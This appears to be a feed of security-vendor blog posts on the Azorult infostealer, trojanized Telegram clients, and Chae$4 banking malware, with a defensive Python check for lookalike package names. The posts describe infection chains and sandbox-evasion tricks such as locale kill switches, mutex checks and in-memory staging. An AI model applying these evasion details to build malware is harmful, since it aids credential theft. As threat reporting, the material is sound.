Well, yes and no. It depends on how and for what the tool is used. The program itself does not make an activity illegal; its use does. If you have written a Remote Access Trojan yourself, you can test and run it in your own home lab, and you can use it on someone else’s systems with their written permission. Using a RAT maliciously, however, may land you in legal trouble. To make the distinction, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

The post Remote Access Trojan (RAT) appeared first on Gridinsoft Blog.

AzorUlt Stealer Is Back In Action, Uses Email Phishing
https://gridinsoft.com/blogs/azorult-stealer-back-in-action/
Tue, 16 Jan 2024 12:22:45 +0000

Cybersecurity experts have stumbled upon a new campaign of the eight-year-old Azorult malware. This infostealer, which collects sensitive data from infected systems, had been dormant since late 2021. But has the old dog learned new tricks?

Azorult Malware Resurfaces After 2 Years

Recent research into the cyber threat landscape has brought concerning news about the Azorult malware. First identified in 2016, this malware was quite notorious back in the day. Among its most notable campaigns was its distribution alongside STOP/Djvu ransomware. However, its activity had been declining since early 2020, and the activity curve went flat in late 2021.

As a stealer from the mid-2010s, it originally carried functionality that suited the times. Azorult specializes in stealing sensitive information such as browsing history, cookies and login credentials. No crypto wallets, no session or 2FA tokens: those were not that valuable back then.

Among the key changes in the resurfaced version are more sophisticated and stealthy methods that could make it very difficult to detect. It also uses a new infection chain and stages and executes the entire payload in memory rather than on disk. Researchers stumbled upon shortcut files masquerading as PDF files that eventually led to Azorult infecting the device. As for the distribution method, experts believe it relies on classic means such as email phishing.

Screenshot: Malicious shortcut file

What is Azorult Malware?

The Azorult malware is a spyware that can steal various data types, including credentials for applications and cryptocurrencies. It is known for its capabilities in harvesting sensitive data from infected systems. Azorult can also download and execute additional payloads, increasing its threat to compromised systems.

In its latest variant, Azorult uses process injection and “Living off the Land” (LotL) techniques to evade detection by security tools. The malware is primarily sold on Russian underground hacker forums, and data stolen with Azorult is likewise sold on Russian dark web marketplaces. In addition to stealing information, the malware collected data for a service that sells ready-made virtual identities. This included as much detail as possible about users’ online behavior: history of website visits, information about the operating system, browser, installed plugins, etc.

In particular, researchers found that 90% of all digital footprints offered on the infamous Genesis Market were associated with Azorult. However, in February 2020 Google released a Chrome update that changed saved-password encryption to AES-256. This broke Azorult’s ability to retrieve passwords from Chrome. Since AZORult’s development had been discontinued in 2018, this release was considered the “death” of AZORult, and it hit Genesis’s business as well.

Azorult Uses Email Spam and LNK Files

The reviewed Azorult sample, as mentioned above, arrived as an .lnk file disguised as a PDF document through the double-extension trick. A file named citibank_statement_dec_2023.lnk triggers a sequence of events that downloads and executes a JavaScript file from a remote server. The JavaScript file downloads two PowerShell scripts, one of which retrieves an executable and starts a new thread to execute the injected code. The loader terminates if the user’s language code matches codes linked to Russia, the most probable home region of its developers. The final payload is, of course, the Azorult infostealer.

Image: Azorult infection chain

Upon execution, it generates a unique identifier for the victim and collects system information, including data on crypto wallets. Azorult terminates if certain conditions are met, such as the presence of a specific mutex or a file named “password.txt” on the Desktop. It also checks for specific machine names and usernames on the victim’s system; if any of these checks return true, the binary exits. Otherwise, Azorult captures screenshots and targets multiple applications. The collected data is compressed, encrypted and sent to a remote server.

Safety Recommendations

Since human error is mostly to blame, the most important recommendation is to beware of phishing. In particular:

  • Unsolicited Emails. Always be skeptical and cautious of emails from unknown sources. Especially those that request personal information or urge you to click on a link.
  • Verify Email Sources. Before responding or clicking, verify the sender’s address and make sure it is legitimate. Avoid clicking links in emails, especially if they look suspicious or too good to be true.
  • Educate Yourself. Stay informed about phishing methods and various phishing-based scam techniques.

The post AzorUlt Stealer Is Back In Action, Uses Email Phishing appeared first on Gridinsoft Blog.

Spyware in Fake Telegram Apps Infected Over 10 million Users
https://gridinsoft.com/blogs/fake-telegram-apps-spyware/
Tue, 12 Sep 2023 14:12:15 +0000

It is important to exercise caution when using messenger mods. Spyware disguised as modified versions of Telegram has been found on the Google Play Store, designed to extract sensitive information from compromised Android devices. Despite these risks, many users still blindly trust any app published on Google Play. We have repeatedly warned that installing apps from Google Play without scrutiny can result in inadvertently downloading a Trojan, a backdoor, a malicious subscriber or other harmful software.

Trojanized Telegram Clients Spread on Google Play

Telegram’s Play Store version uses the package name “org.telegram.messenger”, while the APK downloaded directly from Telegram’s website uses “org.telegram.messenger.web”. Threat actors used lookalike package names ending in “wab”, “wcb” and “wob” to trick users into installing fake Telegram apps. Although they looked like the authentic Telegram app with a localized interface, the infected versions contained an additional module, which Google Play moderators missed. A few days earlier, experts revealed that a malware campaign called BadBazaar was using such rogue Telegram clients to gather chat backups.
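A quick check for the lookalike package names described above is to compare what is installed on a device against the known official package names. The script below is an added example for this article, not a Gridinsoft tool. It assumes the package list comes from “adb shell pm list packages” (the sample output here is constructed) and flags any package within a small edit distance of an official name, or an official name with an extra suffix.

```python
# Constructed "pm list packages" output (not a real device dump).
SAMPLE_PM_OUTPUT = """\
package:com.android.chrome
package:org.telegram.messenger
package:org.telegram.messenger.wab
package:org.telegram.messenger.wcb
package:org.te1egram.messenger
package:com.example.notes
"""

# Package names of the genuine clients; order only matters for tie-breaking.
OFFICIAL_TELEGRAM = ("org.telegram.messenger", "org.telegram.messenger.web")


def levenshtein(a, b):
    """Edit distance between two strings (insert/delete/substitute, cost 1 each)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalikes(pm_output, official=OFFICIAL_TELEGRAM, max_distance=2):
    """Return (package, closest_official, distance) for installed packages imitating an official one."""
    hits = []
    for line in pm_output.splitlines():
        line = line.strip()
        if not line.startswith("package:"):
            continue
        pkg = line[len("package:"):]
        if pkg in official:
            continue
        closest = min(official, key=lambda good: levenshtein(pkg, good))
        distance = levenshtein(pkg, closest)
        # A near-identical name, or an official name with an extra suffix, is a lookalike.
        if distance <= max_distance or any(pkg.startswith(good + ".") for good in official):
            hits.append((pkg, closest, distance))
    return sorted(hits)


if __name__ == "__main__":
    for pkg, closest, distance in find_lookalikes(SAMPLE_PM_OUTPUT):
        print(f"suspicious package {pkg}: {distance} edit(s) from {closest}")
```

A matching package name is only a first signal. The next step is to check the signing certificate of the installed APK against Telegram’s, since a lookalike package signed by an unknown key is the real tell.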

Examples of fake Telegram apps:

Security experts have recently discovered a number of malicious apps on Google Play claiming to be Uyghur, Simplified Chinese and Traditional Chinese versions of Telegram. The apps have descriptions written in those languages and images closely resembling the official Telegram page on Google Play, making them difficult to tell apart from the genuine app.

The developers of these fake apps promote them as a faster version of the regular client, citing a distributed network of data centers around the world. They use this as bait to persuade users to download the mods instead of the official Telegram app.

Screenshot: Simplified Chinese, Traditional Chinese, and Uyghur versions of Telegram on Google Play with spyware inside

How dangerous are fake Telegram apps?

Millions of users downloaded apps that turned out to have malicious features. Among other things, the malicious copies can capture and transmit sensitive information such as names, user IDs, contacts, phone numbers and chat messages to a server controlled by an unknown actor. The experts who discovered this activity codenamed it Evil Telegram. Google has since removed the apps from its platform.

Nonetheless, the problem of poor app moderation on Google Play has persisted for almost a decade. You can upload practically anything, even malware, and it may be removed only after numerous reports flag it as malicious. There is still no guarantee that reports will be processed promptly; some rogue apps remain on Google Play for months. For that reason, the threat will most probably resurface, especially given Telegram’s growing popularity.

How to stay safe?

Here are some important tips to keep yourself safe from infected versions of popular messaging apps and other threats that target Android users:

  • As noted above, Google Play is not immune to malware. It is still a much safer option than third-party sources, so always download and install apps from official stores.
  • Before installing any app, even from an official store, take a closer look at its page and make sure it is legitimate. Pay attention to the app’s name and developer: cybercriminals frequently use typosquatting or spoofing to spread their malware.
  • Reading negative user reviews is a good way to spot problems with an app; if there is one, someone has likely already written about it. Also search for reviews on the web, where feedback is not subject to moderation by the developer or Google. Using several independent sources gives a clearer picture.

The post Spyware in Fake Telegram Apps Infected Over 10 million Users appeared first on Gridinsoft Blog.

Chae$4 Malware Released, Targets Banking & Logistic Orgs
https://gridinsoft.com/blogs/chaes4-malware-update/
Thu, 07 Sep 2023 09:29:11 +0000

Cybersecurity experts have discovered a new variant of Chaes malware called “Chae$4”. This malware targets the banking and logistics industries and significant content management platforms.

New Chae$4 Malware Targets Banking and Logistic Industries

According to a report, researchers have discovered an advanced variant of Chaes malware that predominantly targets e-commerce customers in Latin America. Chae$4 is an infostealer first observed in early 2023. It can steal banking data, intercept bank payments, steal personal data and remotely control infected computers. It is spread via phishing emails containing links or malicious attachments; when the user opens the link or attachment, the malicious code is downloaded to the computer and installs Chae$4.

Once installed, Chae$4 monitors the user’s browser activity, including data entered into banking forms. The malware can also intercept bank payments and redirect them to the attackers, and it can steal personal information such as passwords, logins and credit card numbers. It was named “Chae$4” because it is the fourth major version and carries a debug marker labeled Chaes in its main module. It threatens users of well-known platforms and banks, including WhatsApp Web, MetaMask, Mercado Libre, Mercado Pago, Caixa Bank and Itau Bank. Content management systems such as WordPress, Magento, Drupal and Joomla are also affected.

What is Chaes Malware?

Chaes malware first appeared in mid-2020. It was written in multiple programming languages, relied on LOLBins, and was adept at stealing sensitive financial data. In November of that year, experts published the first study of Chaes. Follow-up research published in January 2022 reported increased Chaes activity in the fourth quarter of 2021 and revealed details of its behavior: the developers had significantly reworked the infection chain and C2 communication and added new integrations.

Screenshot: Chaes developer’s response to researchers

In February 2022, the Chaes developers published a response to the research. The attacker was impressed with the analysis, thanked the experts for their work, and noted that thanks to the analysis the discovered flaws could be fixed. It is unclear whether one person or a group is behind Chaes, as the message was written in both the first person singular and the plural. The experts labeled the attacker “Lucifer”, since the blog name and the identifier used to contact the C2 was “lucifer6”.

Chae$4 Malware Update – What’s New?

Since version 4 has been significantly revised, most of the above applies to the first three versions. The latest version brings an improved code architecture and modularity, as well as new layers of encryption and stealth capabilities. In addition, the move to Python has resulted in lower detection rates by traditional means.

Seven different modules were identified during the analysis, each of which can be updated independently without changing the core functionality. They include a module for identification and data gathering, an online module for monitoring active victims, a credential stealer and clipper module, modules for stealing data from specific banks and browsers, and a module for uploading files to the C2 server. This version re-implements the previous modules with improved functionality and new techniques.

How to protect yourself against Chae$4?

Chae$4 is fileless malware, meaning it does not create files on the victim’s computer, which makes it more difficult to detect and remove. Still, the following tips help protect against Chae$4:

  • Keep your software up to date. Software updates are an integral part of using any device; they include security patches that close the holes malware relies on.
  • Use a firewall. It helps prevent attacks from outside by blocking unauthorized access to your computer.
  • Back up your data regularly. This way, you can restore your data if a machine is infected with malware.
  • Use protective software. An anti-malware solution is the last line of defense and protects your device when vigilance fails: it detects and removes malware that has already infiltrated the machine.

The post Chae$4 Malware Released, Targets Banking & Logistic Orgs appeared first on Gridinsoft Blog.
